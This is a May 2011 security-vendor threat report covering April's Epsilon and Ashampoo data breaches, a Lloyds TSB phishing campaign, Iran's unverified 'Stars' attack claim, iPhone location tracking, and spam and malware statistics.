Threat and Spamscape Report
May 2011
What we saw in April
April was full of domestic breaches, claims of international espionage, phishing attacks and malware that kept us constantly busy. On top of that, Sony's PlayStation Network is under attack from unknown foes, and Facebook users continue to be a prime target for attackers. Here are a few of the highlights:
- April did not start off slow in the realm of security incidents. Epsilon, a large Texas based company that specializes in marketing related email, came clean early April to say that they had suffered a breach and a large unspecified amount of email addresses was accessed. Many major corporate customers could be affected, including members of Chase bank who appear to have already been targeted as a result of this breach.
- Ashampoo, a German based software company, suffered the same fate as Epsilon a few weeks later. The company reported that they had several servers hacked, which contained customer names and contact information. Luckily, no personal or financial information.
- Hundreds of different variations of phishing attacks occur daily, with millions of phishing emails seen monthly. We'll look at one in particular that affected customers of Lloyd's TSB Bank.
- Stuxnet made big news last year as a worm with a very specific purpose. It was highly complex and obviously had a large team behind its creation. The goal was cyber espionage against an Iranian Uranium enrichment facility, which proved to be successful. Now it seems as though Iran has announced that they have thwarted another attack that has targeted them and have dubbed it "Stars". So far, however, there is no proof that this has actually happened. Security professionals wait for clues.
- iPhone and iPad users begin to question Apple as to why constant and resilient information regarding the users' location is being stored in plain text on their devices and in their local backups.
Total Email Traffic Volume
This chart represents both total and spam traffic throughout the month of April. Spam traffic remained level throughout the month.
Tests Failed
This chart represents the number of times messages failed various tests over the past month. Keep in mind that many messages failed multiple tests; hence the total from these charts will surpass the total individual pieces of spam seen during the month of April.
Regions of Origin
This graph represents both spam and malicious email traffic by region. A significant surge in the amount of spam emanating from Asia caused it to outpace Europe for the first time in spam production.
Top Ten Countries of Origin
This chart represents the top countries from which spam originated during April. For the first time in months, both Russia and India surpassed spam output from the United States. We again saw record breaking numbers from Indonesia. Since February, spam levels from Indonesia have increased over 300 percent.
Here's a peak at the curious surge in spam from Indonesia
Top Email-Delivered Viral Threats
These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top position. The virus names that begin with "X." signify rules that were written by AppRiver Analysts. (This doesn't mean that other anti-virus vendors didn't eventually have definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them).
- X.W32.Kryptik.CTR.pak
- X.W32.PX.pakb
- X.W32.PX.pakc
- X.W32.Sasfis.pak
- X.W32\facePakb
- X.W32.Bredolab.apr1
- X.W32.Bredolab.apr4c
- W32\TrojanDownloader.Zurg
- W32\Bredolab.ARL
- X.W32.Bredo.418
- W32\TrojanDownloader.Prod
- X.W32.Buzus.pak
- X.html.fdphish7
- W32\Mydoom.O
- X.W32.Netsky.Q
- W32\Mydoom.R_worm
- W32\Merond.O_worm
- X.W32.Bredo.pic
- X.win32.worm.20080529
- W32\Mydoom.N
30 Day Virus Activity
This chart represents email-borne virus and malware activity during the month of April as seen by AppRiver filters. Messages that contain a virus have been steadily rising since January and this month was no exception. For the third straight month, these messages have more than doubled in quantity. By the end of April we will have quarantined more than 43 million of these messages.
Here is a look at the upward trend of the past six months
Image Spam
The chart below represents total Image spam seen by AppRiver filters during April. Image spam increased slightly this month.
Has Iran Been Targeted Again?
Gholam Reza Jalali, the head of Iran's Passive Defense Organization and Brigadier General, told Iran's Mehr News Agency on Monday April 25th, that they had intercepted and thwarted another direct attack against Iran's infrastructure. He likened this attack to one that proved to be successful last year, the Stuxnet Worm. This attack was highly sophisticated and had been active for a good amount of time before anyone was able to detect it. It used exploits against both human weakness and proprietary systems in order to get its way into the completely closed system and interrupted the Uranium enrichment process at an Iranian facility. However, this new attack which he has entitled, "Stars" has security professionals questioning the news. There have been no details or proof of the attack. There has been no mention of the worm's targets or its possible intent, simply a claim that it has happened. In the Stuxnet case, security companies had samples to analyze and share, and were able to see first-hand the complexity of that worm. It is entirely possible that the Iranian government could still be feeling the sting of Stuxnet and are being a bit jumpy. There is a possibility that this was not a directed attack at all, but possibly a broadly cast malware campaign that happened to go in that direction that was initially mistaken for a directed attack. Without any sort of sample or even an MD5 hash to compare to, unfortunately, we'll just have to wait and see.
The Epsilon Breach
The very first few days of April brought news that Epsilon, a company specializing in email based marketing, suffered a major data breach. The company is responsible for sending marketing related emails on behalf of many large corporations including Capitol One, CitiGroup, US Bank and many more. Hackers were able to gain access to an unspecified number of valid email addresses and presumably the list that correlates to each specific user. Epsilon reportedly does not store any of the customers personal or account information therefore the breach would be limited to names, email addresses and their corresponding company affiliation. For example, a Capitol One bank customer may have had their email address stolen by the hacker. Along with the email address, the hacker now has knowledge that the email address belongs to a customer of that particular bank.
This information can be very beneficial when used in spamming, phishing and viral attacks. Usually attackers would send out mass emails to as many individuals as possible with the assumption that a small percentage of them will belong to the financial institution used in the message campaign. Now that this group has stolen data, they can tailor mass email phishing campaigns directed solely at the customers of a specific company. In addition to the more accurately aimed mass email campaigns, these hackers can also narrow their focus by sending more carefully crafted spear-phishing attacks to users on their newly acquired list. Any way you look at it, this breach will give the cybercrooks a lot of ammunition for their attacks.
It has since been reported that members of Chase bank have already been targeted using the information stolen from the Epsilon breach according to the Better Business Bureau. The emails sent to Chase customers claim that their accounts will be frozen if they do not comply by replying with sensitive account information. Here is a sample of what the emails looked like.
It is important to remain aware when you receive emails that claim to come from financial institutions. If they house requests for information, think twice about what you are looking at. And if there is any question at all, contact them directly. Do not rely on demands for information, or notifications of personal account breaches or freezing when you have received them via email. After this particular breach it is especially important to stay attentive and alert if you do business with any of the following companies whose corporate client emails were compromised in the Epsilon breach:
US Bank, Citibank, Barclay's, JP Morgan/Chase, Kroger, Best Buy, Walgreens, Target, HSN, Marriot, Hilton, Disney Destinations, and Red Roof Inn.
Ashampoo Suffers a Breach Too
German software company Ashampoo makers of many software products from Anti-Virus to Photo Editors and CAD programs was also the target of hackers later into April. Much like the Epsilon breach, the attack on several of Ashampoo's servers resulted in the compromise of customer email addresses and names, but not financial data which was held in separate locations. There are claims that this information has also already been used to send malicious pdf attachments to previous Ashampoo customers disguised as order confirmation receipts. Ashampoo issued this warning to their clients.
"Dear Ashampoo customer,
We are writing to you concerning an important issue. We regret to tell you that we also detected an unauthorized access to one of our server systems. We assume that the attackers were able to purloin data of customers. Sensitive data such as billing information etc. is not affected by this, because Ashampoo does not store this data. We summarized all pieces of information concerning this incident for you and would like you to read the following website :http://www.ashampoo.com/datatheft"
Llyod's Customers Targeted
We see millions of phishing attacks each month. A lot of them appear to have little effort put behind them, and others appear more sophisticated. Some even try new techniques, whereas others are just simple and straightforward. This month we wanted to point out a common ploy that clients could likely see in the wild. This isn't a particularly impressive attack, though its use of graphics and minor obfuscation techniques could trap some unwilling victims.
During the third week of April we saw this particular phishing campaign coming in targeting Lloyd's TSB customers. These contained Html attachments. The subject of these emails was what caught our eye. Instead of the tried and true/ run-of-the-mill approach, these attackers were trying entice their victims by making them believe that they just may be coming into money.
Once the attachment is opened the viewer is given this page:
The use of an HTML document in phishing has become popular simply because it gives the illusion that the victim has browsed to a website when in actuality they are viewing this page locally, which is obvious if you view the address bar. This graphic rich Html page directs recipients to what appears to be the Lloyd's TSB website, though it instead sends them to another site that has been exploited and hosts the malicious phishing pages and stolen information.
The first page attempted to get the user's ID and password. Ordinarily, these phishing sites will have some sort of check in place to make sure you've given it accurate information, or at least what appears to be accurate information. This one does not; simply clicking "Continue" without entering any information at all took us to the next page.
Here's where it goes on to extract even more information that a real bank would never ask you. After clicking "Continue" on this page, the victim is sent to the real Lloyd's banking log-in page where the victim will then learn something they may have wished they had known before filling out either of those pages:
iPhone and iPad Users Share Information
Researchers Pete Warden and Alasdair Allan discovered recently that the iPhone and the iPad have built in functionality to track and maintain a database of a user's location. This database is kept on the device itself as well as on the computer that these devices sync to. The database contains very detailed latitude and longitudinal coordinates as well as a timestamp from every time that they are collected. The worst part about all of this is that they are kept in plain text on both the device and the iTunes backup that they connect to. This certainly raises concern not only for the "big brother is watching" aspect, but also for the fact that someone with the ability could create custom malware to extract this information giving them a running timeline of your day's events and locations. This could raise issue with personal safety as well as giving would-be thieves the perfect time of day when you'll be away from your home and for how long. It is even possible that this information could be gathered and sold in batches much like credit card numbers are currently on underground forums, though given the complexity of the cybercrime game and its participants' desire to cover their tracks and avoid actual physical connection to their crimes other than through their computers, this vector may be less likely. Class action lawsuits are already taking shape. One in particular filed by two men in Florida claim "users of Apple products have ... no way to prevent Apple from collecting this information because even if users disable the iPhone and iPad GPS components, Apple's tracking system remains fully functional."
I believe it would be in Apple's best interest to stop collecting this information or to at least begin encrypting it as soon as possible to avoid giving up any low hanging fruit.
The researchers as created a program for extracting this data and visualizing it on a map. It will also run through the timeline so viewers can see their paths as they were traveled. Here is a composite view of my recent trip to Chicago for ThotCon 0x2 to give you an idea.
